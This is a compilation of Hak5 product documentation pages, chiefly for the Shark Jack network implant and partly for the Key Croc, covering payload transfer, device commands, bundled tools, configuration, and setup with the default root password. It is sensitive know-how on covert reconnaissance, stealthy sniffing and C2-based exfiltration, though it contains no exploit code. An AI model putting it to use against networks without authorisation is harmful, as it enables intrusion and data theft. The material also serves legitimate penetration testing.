# Two Key Commands | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Two Key Commands
================
Whether on Windows, Mac or Linux – working with the [Shark Jack](https://shop.hak5.org/products/shark-jack)
is most convenient from the command line. Best of all, since modern versions of Windows ship with PowerShell, these work identically on all three platforms. In this article I’ll show you two commands that’ll make working with the Shark Jack a breeze, and how exactly they work.

}}
Outside of the occasional firmware update, the two biggest functions you’ll face when using your Shark Jack in arming mode – the devices management mode – are uploading payloads to the device and downloading loot (log files generated by payloads) from the device.
info
Shark Jack Cable users may consider managing the device via the dedicated Serial console rather than via SSH and SCP.
As you know from the official documentation, in arming mode the Shark Jack runs as a server – both a DHCP server, which will assign your computer an IP address on its network (a network of two, you and it) as well as an SSH server. The SSH server, or Secure Shell, lets you securely access the Shark Jack’s command-line. When you ‘ssh into’ the Shark Jack, you’ll get a bash shell on this tiny Linux box – from which you can manage the payload file in `/root/payload`, and the captured loot in `/root/loot`. But SSH has another function, and with it you may never need to drop into the Shark’s bash shell.
SCP, or Secure Copy, works just like the cp command locally – except over the Secure Shell (SSH). Using it you can copy files to and from remote devices, just as you would locally using ‘`cp`’ in Bash or PowerShell, or ‘copy’ in CMD. And with that, here are the two scp commands that’ll make your Shark Jack life a breeze.
I’ll show you from the Windows users perspective in PowerShell – but the same commands will hold true for the terminal on MacOS and Linux.
COPYING A PAYLOAD TO THE SHARK JACK [_link_](https://docs.hak5.org/shark-jack/beginner-guides/two-key-commands/#copying-a-payload-to-the-shark-jack)
-----------------------------------------------------------------------------------------------------------------------------------------------------
I like to keep an up to date copy of the Shark Jack payload repository on my computer – so I can try out the latest creations from the Hak5 community. In this example I’ll show you how to copy the ipinfo payload, in the form of a shell script or payload.sh file, to the Shark Jack. It’s on my hard disk in `C:\Users\bob\SharkJack\payloads\ipinfo`, so if I navigate there in PowerShell I can use the scp command to ferry that file over to the Shark Jack’s payload folder - overwriting anything that may already exist there.
> `scp .\payload.sh root@172.16.24.1:payload/`
The first part invokes the ‘scp’ command to securely copy the file. This command takes two parameters – from and to. In this case the first parameter, from, is the payload.sh file in this local working directory. In Windows PowerShell this is prefixed with `.\.` The next parameter, to, specifies where on the Shark Jack in the form of three elements: the user, the IP address, and the directory. In this case the user is root, the IP address of the Shark Jack is `172.16.24.1`, and the directory is `:payload/`.
A remote host with scp takes the form of `user@host:directory` – with `@` separating user and host, and `:` separating host and directory. If no directory is specified after the `:`, the default will be the user’s home directory. In this case, the root user’s home directory is `/root/` – so specifying `:payload/` is the same as specifying `:/root/payload/` (just with less typing).
Keep in mind this command is going to copy the local `payload.sh` file over to the Shark Jack in `/root/payload/`, overwriting any `payload.sh` file that’s already there.\\
COPYING LOOT FROM THE SHARK JACK [_link_](https://docs.hak5.org/shark-jack/beginner-guides/two-key-commands/#copying-loot-from-the-shark-jack)
-----------------------------------------------------------------------------------------------------------------------------------------------
Using the same method as above, we’re going to reverse the from and to fields to recursively copy loot from the Shark Jack to the local computer.
> `scp -r root@172.16.24.1:loot/ .`
In this case the `-r` argument is specified so say to recursively copy the files. This means it’ll copy files from all of the nested directories, since each payload saves loot to its own folder. The rest of the command is similar to the previous, only reversed. In this case the from field is the remote host – again in the form of `user@host:directory`. The to field is the current working directory, as represented by ‘`.`’ – or it could be any path such as `c:\Users\bob\SharkJack\loot\`
So there you go, the two commands that make copying files – payloads and loot – to and from the [Shark Jack](https://shop.hak5.org/products/shark-jack)
a breeze. Now if you’re looking for something a little more graphical, similar to Windows Explorer, you may want to check out [WinSCP](https://winscp.net/eng/index.php)
, [FileZilla](https://filezilla-project.org/)
, or [CyberDuck](https://cyberduck.io/)
– all pretty graphical scp tools. Cheers!
* * *
[_navigate\_before_ Using Sharkjack.sh](https://docs.hak5.org/shark-jack/beginner-guides/using-sharkjack.sh/)
[Writing A Simple Payload _navigate\_next_](https://docs.hak5.org/shark-jack/beginner-guides/writing-a-simple-payload/)
---
# Over The Air Upgrade | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Over The Air Upgrade
====================
Shark Jack Cable users may conveniently upgrade their device’s firmware by running the `UPDATE_FIRMWARE` command.
1. Plug the Shark Jack Cable into a network which provides Internet access via DHCP
2. Flip the Shark Jack Cable switch to Arming Mode
3. Power the Shark Jack Cable via USB-C from a compatible computer or smartphone
4. From the computer or smartphone, access the Shark Jack shell via Serial
5. Press ENTER to activate the serial console
6. From the `root@shark:~#` prompt, type `UPDATE_FIRMWARE` and press ENTER
If the Shark Jack Cable has Internet access and an update is available, it will download and install automatically.
To cancel the installation, press `CTRL+C` during the 10 second countdown period.
info
If the update fails with an SSL certificate error, verify that the device has the correct date and time with the `date` command, and if necessary rectify this with an NTP update manually using the command `ntpd -q -p 1.openwrt.pool.ntp.org`
report
DO NOT UNPLUG THE SHARK JACK CABLE DURING THE FIRMWARE INSTALL PROCESS. This process will require 5-10 minutes. Powering off the Shark Jack Cable at this time will result in damage to the device that may render it inoperable.
* * *
[_navigate\_before_ Manual Upgrade](https://docs.hak5.org/shark-jack/software-updates/manual-upgrade/)
[Payload Development Basics _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/payload-development-basics/)
---
# The NETMODE Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The NETMODE Command
===================
`NETMODE` is a Ducky Script command which specifies which network mode to use in a given payload. These network modes determine how the Shark Jack will interface with the network.
info
This command was added in Shark Jack firmware version 1.1.0 and is not available on Shark Jack 1.0.0 or 1.0.1. Shark Jack users, see Software Updates. Shark Jack Cable users, your device comes by default with firmware version 1.2.0 or higher.
**NETMODE DHCP\_CLIENT** [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/#netmode-dhcp_client)
------------------------------------------------------------------------------------------------------------------------------
In this mode, the Shark Jack will attempt to obtain an IP address from the target network via DHCP. This is the most common network mode.
`NETMODE DHCP_CLIENT`
**NETMODE DHCP\_SERVER** [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/#netmode-dhcp_server)
------------------------------------------------------------------------------------------------------------------------------
In this mode, the Shark Jack will run a DHCP server and offer an IP address to the host computer on its network in the 172.16.24.0/24 range, similar to Arming mode. This network mode enables attacks against individual computers via Ethernet rather than the network as a whole.
`NETMODE DHCP_SERVER`
**NETMODE TRANSPARENT** [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/#netmode-transparent)
-----------------------------------------------------------------------------------------------------------------------------
In this mode, the Shark Jack will not offer or attempt to obtain an IP address from DHCP and may be used in conjunction with passive network sniffing programs when more stealth is desired.
`NETMODE TRANSPARENT`
* * *
[_navigate\_before_ Payload Development Basics](https://docs.hak5.org/shark-jack/writing-payloads/payload-development-basics/)
[The LED Command _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/)
---
# The BATTERY Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The BATTERY Command
===================
`BATTERY` is a Ducky Script command which will output the current battery state.
| State | Note |
| --- | --- |
| `discharging` | The battery is discharging |
| `full` | The battery is full |
| `charging` | The battery is charging |
info
The `BATTERY` command is specific to the original Shark Jack and is not applicable for the Shark Jack Cable variant as it does not include a built-in battery.
* * *
[_navigate\_before_ The SWITCH Command](https://docs.hak5.org/shark-jack/writing-payloads/the-switch-command/)
[The SERIAL\_WRITE Command _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/the-serial_write-command/)
---
# The SWITCH Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The SWITCH Command
==================
`SWITCH` is a Ducky Script command which will indicate which position the Shark Jack’s switch is in.
| position | note |
| --- | --- |
| `switch1` | OFF/Charging |
| `switch2` | Arming Mode |
| `switch3` | Attack Mode |
* * *
[_navigate\_before_ The LED Command](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/)
[The BATTERY Command _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/the-battery-command/)
---
# The SERIAL_WRITE Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The SERIAL\_WRITE Command
=========================
The `SERIAL_WRITE` command will write any following text to the serial console. This is useful for adding meaningful output to a payload.
info
The ACTIVATE command was introduced with firmware 1.2.0 on the Shark Jack Cable.
Example [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-serial_write-command/#example)
------------------------------------------------------------------------------------------------------
Add output to a payload with the following:
`LED ATTACK SERIAL_WRITE [*] Starting nmap scan... nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt`
Using Variables [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-serial_write-command/#using-variables)
----------------------------------------------------------------------------------------------------------------------
The `SERIAL_WRITE` command will parse any variables, much like the `echo` command.
`root@shark:~# DATE=$(date) root@shark:~# SERIAL_WRITE $DATE Tue Aug 24 00:26:55 UTC 2021 root@shark:~#`
* * *
[_navigate\_before_ The BATTERY Command](https://docs.hak5.org/shark-jack/writing-payloads/the-battery-command/)
[The Cloud C2 Commands _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/the-cloud-c2-commands/)
---
# The LED Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The LED Command
===============
The multi-color RGB LED status indicator on the Bash Bunny may be set using the LED command. It accepts either a combination of color and pattern, or a common payload state.
LED COLORS [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/#led-colors)
---------------------------------------------------------------------------------------------------
| COMMAND | Description |
| --- | --- |
| R | Red |
| G | Green |
| B | Blue |
| Y | Yellow (AKA as Amber) |
| C | Cyan (AKA Light Blue) |
| M | Magenta (AKA Violet or Purple) |
| W | White |
LED PATTERNS [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/#led-patterns)
-------------------------------------------------------------------------------------------------------
| PATTERN | Description |
| --- | --- |
| SOLID | _Default_ No blink. Used if pattern argument is ommitted |
| SLOW | Symmetric 1000ms ON, 1000ms OFF, repeating |
| FAST | Symmetric 100ms ON, 100ms OFF, repeating |
| VERYFAST | Symmetric 10ms ON, 10ms OFF, repeating |
| SINGLE | 1 100ms blink(s) ON followed by 1 second OFF, repeating |
| DOUBLE | 2 100ms blink(s) ON followed by 1 second OFF, repeating |
| TRIPLE | 3 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUAD | 4 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUIN | 5 100ms blink(s) ON followed by 1 second OFF, repeating |
| ISINGLE | 1 100ms blink(s) OFF followed by 1 second ON, repeating |
| IDOUBLE | 2 100ms blink(s) OFF followed by 1 second ON, repeating |
| ITRIPLE | 3 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUAD | 4 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUIN | 5 100ms blink(s) OFF followed by 1 second ON, repeating |
| SUCCESS | 1000ms VERYFAST blink followed by SOLID |
| 1-10000 | Custom value in ms for continuous symmetric blinking |
LED STATE [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/#led-state)
-------------------------------------------------------------------------------------------------
These standardized LED States may be used to indicate common payload status. The basic LED states include **SETUP**, **FAIL**, **ATTACK**, **CLEANUP** and **FINISH**. Payload developers are encouraged to use these common payload states. Additional states including multi-staged attack patterns are shown in the table below.
| STATE | COLOR PATTERN | Description |
| --- | --- | --- |
| SETUP | M SOLID | Magenta solid |
| FAIL | R SLOW | Red slow blink |
| FAIL1 | R SLOW | Red slow blink |
| FAIL2 | R FAST | Red fast blink |
| FAIL3 | R VERYFAST | Red very fast blink |
| ATTACK | Y SINGLE | Yellow single blink |
| STAGE1 | Y SINGLE | Yellow single blink |
| STAGE2 | Y DOUBLE | Yellow double blink |
| STAGE3 | Y TRIPLE | Yellow triple blink |
| STAGE4 | Y QUAD | Yellow quadruple blink |
| STAGE5 | Y QUIN | Yellow quintuple blink |
| SPECIAL | C ISINGLE | Cyan inverted single blink |
| SPECIAL1 | C ISINGLE | Cyan inverted single blink |
| SPECIAL2 | C IDOUBLE | Cyan inverted double blink |
| SPECIAL3 | C ITRIPLE | Cyan inverted triple blink |
| SPECIAL4 | C IQUAD | Cyan inverted quadriple blink |
| SPECIAL5 | C IQUIN | Cyan inverted quintuple blink |
| CLEANUP | W FAST | White fast blink |
| FINISH | G SUCCESS | Green 1000ms VERYFAST blink followed by SOLID |
### EXAMPLES [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/#examples)
`LED Y SINGLE`
`LED M 500`
`LED SETUP`
* * *
[_navigate\_before_ The NETMODE Command](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/)
[The SWITCH Command _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/the-switch-command/)
---
# Charge The Shark Jack From Your Phone | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Charge The Shark Jack From Your Phone
=====================================
Many Android smartphones with USB-C interfaces support powering accessory devices. This can be useful in a pinch to charge your Shark Jack when a traditional USB power source or USB battery bank is not available. From the USB Preferences menu, select “Connected device” from the USB controlled by section.

IMG\_20191112\_123419.jpg
}}
* * *
[_navigate\_before_ Firmware Recovery](https://docs.hak5.org/shark-jack/troubleshooting/firmware-recovery/)
[Using The Shark Jack With The Plunder Bug As A Simple Switch _navigate\_next_](https://docs.hak5.org/shark-jack/tips-and-tricks/using-the-shark-jack-with-the-plunder-bug-as-a-simple-switch/)
---
# Android Serial Setup For Shark Jack Cable | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Android Serial Setup For Shark Jack Cable
=========================================
Recommended apps:
* [Serial USB Terminal](https://play.google.com/store/apps/details?id=de.kai_morich.serial_usb_terminal\\&hl=en_US\\&gl=US)
* [Hacker’s Keyboard](https://play.google.com/store/apps/details?id=org.pocketworkstation.pckeyboard\\&hl=en_US\\&gl=US)
* * *
[_navigate\_before_ Using The Shark Jack With The Plunder Bug As A Simple Switch](https://docs.hak5.org/shark-jack/tips-and-tricks/using-the-shark-jack-with-the-plunder-bug-as-a-simple-switch/)
[Specifications _navigate\_next_](https://docs.hak5.org/shark-jack/product-information/specifications/)
---
# Configuration Options | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Configuration Options
=====================
Among the files and folders present on the USB flash disk is `config.txt`. Editing this file with a standard text editor (like Notepad on Windows, TextEdit on Mac, vim/nano on Linux) will let you configure settings such as keymap, WiFi, SSH and DNS.
### MANDATORY CONFIGURATIONS [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#mandatory-configurations)
The only mandatory configuration is the language/keymap, which by default is set to US.
` DUCKY_LANG us`
### OPTIONAL CONFIGURATIONS [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#optional-configurations)
#### NETWORKING [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#networking)
`WIFI_SSID [network name] WIFI_PASS [network password] SSH [ENABLE, DISABLE] DNS [address 1] [address 2]`
#### [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#x20)
#### DEVICE IDENTIFIERS [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#device-identifiers)
`VID [VID_0X] PID [PID_0X] MAN [MAN_label] PROD [PROD_label] # Specifies the iProduct USB descriptor SERIAL [serial] # Specifies the iSerial USB descriptor`
#### [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#x20-1)
#### PROTECTED ARMING MODE [_link_](https://docs.hak5.org/key-croc/configuration/configuration-options/#protected-arming-mode)
report
`WARNING: MISCONFIGURATIONS BELOW WILL LOCK YOU OUT OF YOUR DEVICE.`
`ARMING_PASS [password] # Requires [password] to be typed on the keyboard attached to the Key Croc to enter arming mode. ARMING_TIMEOUT [seconds] # (OPTIONAL WITH ARMING_PASS) Defining this adds a timeout to the protected arming mode listener # EXAMPLE: # ARMING_PASS hak5croc # ARMING_TIMEOUT 5 # # This allows 5 seconds to press the button after typing hak5croc on the attached keyboard`
* * *
[_navigate\_before_ Password Sniffing With The Key Croc Easy Or Super Easy](https://docs.hak5.org/key-croc/beginner-guides/password-sniffing-with-the-key-croc-easy-or-super-easy/)
[Configuring Cloud C _navigate\_next_](https://docs.hak5.org/key-croc/configuration/configuring-cloud-c/)
---
# Included Tools | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Included Tools
==============
Tools Pre-Installed [_link_](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/#tools-pre-installed)
--------------------------------------------------------------------------------------------------------------------
From v1.0.x
* autossh
* nmap
* nc
* wget
* python
From v1.1.x
* arp-scan
* hping3
* macchanger
* ngrep
* nping
* p0f
* tcpdump
Installing Additional Tools [_link_](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/#installing-additional-tools)
------------------------------------------------------------------------------------------------------------------------------------
In order to install additional tools the Shark Jack will require an Internet connection in Arming Mode. Typically this is achieved by using the `NETMODE DHCP_CLIENT` command.
Connect to the Shark Jack shell by SSH (or Serial in the case of the Shark Jack Cable) and plug it into a local network. Ensure that it has Internet connection (e.g. `ping -c4 1.1.1.1`). If it does not, use the `NETMODE` command above to establish an Internet connection via DHCP.
Update the package manager with `opkg update`. Using the `opkg list` command you may find the name of the package you wish to install. Finally, install the package with the command `opkg install `.
### Example [_link_](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/#example)
`root@shark:~# opkg install httping Installing httping (2.5-1) to root... Downloading http://downloads.openwrt.org/releases/18.06-SNAPSHOT/packages/mipsel_24kc/packages/httping_2.5-1_mipsel_24kc.ipk Configuring httping. root@shark:~# httping No URL/host to ping given root@shark:~# httping example.com PING example.com:80 (/): connected to 93.184.216.34:80 (43 bytes), seq=0 time= 27.99 ms connected to 93.184.216.34:80 (357 bytes), seq=1 time= 18.41 ms connected to 93.184.216.34:80 (351 bytes), seq=2 time= 17.20 ms connected to 93.184.216.34:80 (43 bytes), seq=3 time= 17.45 ms connected to 93.184.216.34:80 (43 bytes), seq=4 time= 17.35 ms connected to 93.184.216.34:80 (43 bytes), seq=5 time= 17.39 ms ^CGot signal 2 --- http://example.com/ ping statistics --- 6 connects, 6 ok, 0.00% failed, time 5946ms round-trip min/avg/max = 17.2/19.3/28.0 ms root@shark:~#`
Learn more about using the opkg package manager from the OpenWRT documentation at [https://openwrt.org/docs/guide-user/additional-software/opkg](https://openwrt.org/docs/guide-user/additional-software/opkg)
* * *
[_navigate\_before_ The Cloud C2 Commands](https://docs.hak5.org/shark-jack/writing-payloads/the-cloud-c2-commands/)
[The UPDATE\_PAYLOADS Command _navigate\_next_](https://docs.hak5.org/shark-jack/managing-payloads/the-update_payloads-command/)
---
# The LIST Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The LIST Command
================
The `LIST` command, and its alias `LIST_PAYLOADS`, will list all of the payloads stored locally in the payload library at `/root/payload/library`.
info
The ACTIVATE command was introduced with firmware 1.2.0 on the Shark Jack Cable.
Usage [_link_](https://docs.hak5.org/shark-jack/managing-payloads/the-list-command/#usage)
-------------------------------------------------------------------------------------------
`root@shark:~# LIST Payloads ======== example --------- cloudc2-multi-file-exfiltration recon --------- Nmap-C2 SLAP-Nmap-to-Slack Sample-Nmap-Payload ipinfo netdiscover util --------- Jack-Tester internet-access-tester mac-changer package-installer ping-tester ssh-ip-blinker root@shark:~#`
info
If the payload library has not been synchronized with the online repository, run the UPDATE\_PAYLOADS command.
* * *
[_navigate\_before_ The UPDATE\_PAYLOADS Command](https://docs.hak5.org/shark-jack/managing-payloads/the-update_payloads-command/)
[The ACTIVATE Command _navigate\_next_](https://docs.hak5.org/shark-jack/managing-payloads/the-activate-command/)
---
# The ACTIVATE Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The ACTIVATE Command
====================
The ACTIVATE command, and its alias ACTIVATE\_PAYLOAD, specifies a payload from the local library to set for use on next boot in attack mode. This command is expected to be run from Arming Mode, and is intended for use with the Shark Jack Cable.
info
The ACTIVATE command was introduced with firmware 1.2.0 on the Shark Jack Cable.
USAGE [_link_](https://docs.hak5.org/shark-jack/managing-payloads/the-activate-command/#usage)
-----------------------------------------------------------------------------------------------
`/usr/bin/ACTIVATE [payload]`
check\_circle
Since `ACTIVATE` is located in the `$PATH`, the absolute `/usr/bin/` directory may be omitted.
EXAMPLES [_link_](https://docs.hak5.org/shark-jack/managing-payloads/the-activate-command/#examples)
-----------------------------------------------------------------------------------------------------
`/usr/bin/ACTIVATE recon/nmap (Use a payload inside the library) /usr/bin/ACTIVATE /tmp/payload.sh (Use a specific file as the payload)`
* * *
[_navigate\_before_ The LIST Command](https://docs.hak5.org/shark-jack/managing-payloads/the-list-command/)
[Firmware Recovery _navigate\_next_](https://docs.hak5.org/shark-jack/troubleshooting/firmware-recovery/)
---
# Important Safety Information And Warnings | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Important Safety Information And Warnings
=========================================
The Shark Jack contains a Lithium-Polymer (LiPo) battery. Never leave near flammable material, liquids or in extreme temperatures as excessive heat, fire, damage and injury can occur. Never leave unattended while charging. Disconnect charger if battery becomes hot. Read all instructions before use.
Your device may get hot to the touch; this is normal. Unplug the device and let it cool before removing it. This device complies with applicable surface temperature standards and limits defined by the International Standard for Safety (IEC 60950-1). Still, sustained contact with warm surfaces for long periods of time may cause discomfort or injury. Keep the device in a well-ventilated area when in use. Allow for adequate air circulation under and around the device. Do not expose the device to water or extreme conditions (moisture, heat, cold, dust), as the device may malfunction or cease to work when exposed to such elements. Do not attempt to disassemble or repair the device yourself. Doing so voids the limited warranty and could harm you or the device. This device is not designed, manufactured or intended for use in hazardous environments requiring fail-safe performance in which the failure of the device could lead directly to death, personal injury, or severe physical or environmental damage.
Shark Jack is a trademark of Hak5 LLC. This product is packaged with a limited warranty, the acceptance of which is a condition of sale. See Hak5.org for additional warranty details and limitations. Availability and performance of certain features, services and applications are device and network dependent and may not be available in all areas; additional terms, conditions and/or charges may apply. All features, functionality and other product specifications are subject to change without notice or obligation. Hak5 LLC reserves the right to make changes to the products description in this document without notice. Hak5 LLC does not assume any liability that may occur due to the use or application of the product(s) described herein. Made in China. Designed in San Francisco by Hak5 LLC, 548 Market Street, #39371, San Francisco, CA, 94104. Hak5.org.
The Shark Jack is a network administration and pentesting tool for authorized auditing and security analysis purposes only where permitted subject local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. © Hak5 LLC.
* * *
[_navigate\_before_ Specifications](https://docs.hak5.org/shark-jack/product-information/specifications/)
---
# Unboxing And Setup | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Unboxing And Setup
==================
* * *
description: >- This article describes the basic process of setting up, deploying the default nmap scan attack and retrieving loot from the Shark Jack. [_link_](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/#nmap-scan-attack-and-retrieving-loot-from-the-shark-jack)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
So your [Shark Jack](https://shop.hak5.org/products/shark-jack)
just arrived, you’ve had a moment to appreciate the sweet metal case it comes in, and now you’re eager to dig in and get your hack on! Keep reading.

}}
TL;DR - Read the safety info & diagram on the card. Charge it by USB. Flip the switch far forward and plug it into your LAN. When the light goes green, the trap is clean. Unplug, flip the switch to the middle position and plug it into your computer. SSH to `root@172.16.24.1` (pass: ‘`hak5shark`’) and find the scan results in /root/loot.
Cool, then what? Read up at [docs.hak5.org](https://docs.hak5.org/)
, grab the latest firmware & tools from downloads.hak5.org, get chatty at forums.hak5.org, spin up your very own Cloud C2 server from [c2.hak5.org](https://c2.hak5.org/)
, and finally nab & contribute payloads from [payloads.hak5.org](https://payloads.hak5.org/)
. Enjoy!
Now obviously the prudent first step would be to RTFM (which you can find at docs.hak5.org) but let’s throw caution to the wind… That is, with the exception of reviewing all of that important safety information – it does include a Lithium battery after all.
Pay heed.\\
STEP 1: CHARGE IT UP [_link_](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/#step-1-charge-it-up)
------------------------------------------------------------------------------------------------------------------------
Flip that mischievous red attack switch to the OFF position - that’s the position closest to the USB-C port. Then plug in a USB-C cable to your charger of choice. The [Shark Jack](https://shop.hak5.org/products/shark-jack)
will sip a steady 5 volts and about a half amp. After a brief green-blinking boot, it’ll blink blue to show that the battery is charging. Give it a few minutes and it’ll light solid blue. Then, unplug it. And as you recall from that important safety information – you don’t leave lithium batteries unattended while charging. Just sayin’
info
Shark Jack Cable users may skip this step as it does not include a built-in battery.

}}
STEP 2: JACK INTO A NETWORK [_link_](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/#step-2-jack-into-a-network)
--------------------------------------------------------------------------------------------------------------------------------------
Unplug your [Shark Jack](https://shop.hak5.org/products/shark-jack)
from the USB charger and give it a moment to cool down. It’ll be a little warm from charging, but as you know from that important safety information it complies with IEC standards – so you’re all good. Just keep that sly red switch in the off position and take a moment to practice wielding the Shark Jack as if a floppy disk while reciting “you talkin’ to me, punk?” in the mirror. Where were we again? Oh right - jacking into your network…

}}
Find that sweet 24 port switch mounted in your network closet, or RJ45 wall plate if you’ve gone full-geek and wired the house with CAT6. Repeat the phrase “this is my network and I’m totally authorized to pentest it” - then flip the evil red switch far forward, closest to the Ethernet jack, to put it in attack mode. It’ll start booting and blinking - and at any time it’s ready to be plugged into your network. Right outa the box it’ll perform a simple nmap scan - and when the fun is done, the light will go green (and the trap will be clean). It’s then safe to unplug.\\
STEP 3: SSH IN TO NAB LOOT [_link_](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/#step-3-ssh-in-to-nab-loot)
------------------------------------------------------------------------------------------------------------------------------------
Flip that crafty red switch to the middle position to put your [Shark Jack](https://shop.hak5.org/products/shark-jack)
into arming mode. Here instead of being a client on your network, it’ll act as a server. Connect it to your computer’s Ethernet port and you’ll get assigned an IP address in the 172.16.24.x hood. From there just open terminal if on MacOS or Linux, or powershell if you’re on Windows. Then SSH into the Shark Jack with the command “`ssh root@172.16.24.1`”. The default password is “`hak5shark`”. After admiring the cute shark ASCII art in the banner, cd over to /root/loot and enjoy those scan results. Want to change the payload? Just copy a `payload.sh` to `/root/payload` – and there’s a growing collection at payloads.hak5.org
info
Shark Jack Cable users may access the shell via Serial rather than SSH as no Ethernet interface is required.

}}
Want to make all that even easier? Download the `sharkjack.sh` script (for Mac and Linux) from the Shark Jack section of [downloads.hak5.org](https://downloads.hak5.org/)
– it’ll automate gathering loot, swapping out payloads and even upgrading the firmware (you’ll wanna do that – new features and tools are added from time to time).\\
### THAT’S IT FOR THE BASICS [_link_](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/#thats-it-for-the-basics)
Of course you should also familiarize yourself with the ins and outs detailed in the official [Shark Jack](https://shop.hak5.org/products/shark-jack)
documentation at [docs.hak5.org](https://docs.hak5.org/)
.
Once you start diving in and testing payloads, you may also want to set yourself up with a Cloud C2 server – it’s great for remote access and exfiltration and is supported by a lot of the payloads. There’s a free community version to be had at [c2.hak5.org](https://c2.hak5.org/)
, and it runs on your own hardware, so we never see your bits (we don’t wanna see ’em).
And finally, join the community at [forums.hak5.org](https://forums.hak5.org/)
– it’s home to some really bright pentesters and enthusiasts just like yourself, so you’ll fit right in. Cheers!
* * *
[_navigate\_before_ Default Settings](https://docs.hak5.org/shark-jack/getting-started/default-settings/)
[Using Sharkjack.sh _navigate\_next_](https://docs.hak5.org/shark-jack/beginner-guides/using-sharkjack.sh/)
---
# USB Identifiers | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
USB Identifiers
===============
`ATTACKMODE` is a command which specifies which devices to emulate. The `ATTACKMODE` command may be issued multiple times within a given payload. For example, a payload may begin by emulating just HID (keyboard/keyboard passthrough), then switch to emulating both HID and Ethernet later based on a number of conditions.
ECM\_ETHERNET [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/#ecm_ethernet)
-----------------------------------------------------------------------------------------------------------------------------
ECM – Ethernet Control Model. In this attack mode, the Key Croc will emulate a USB Ethernet adapter for Linux, Mac and Android targets. For Windows targets, see RNDIS\_ETHERNET.
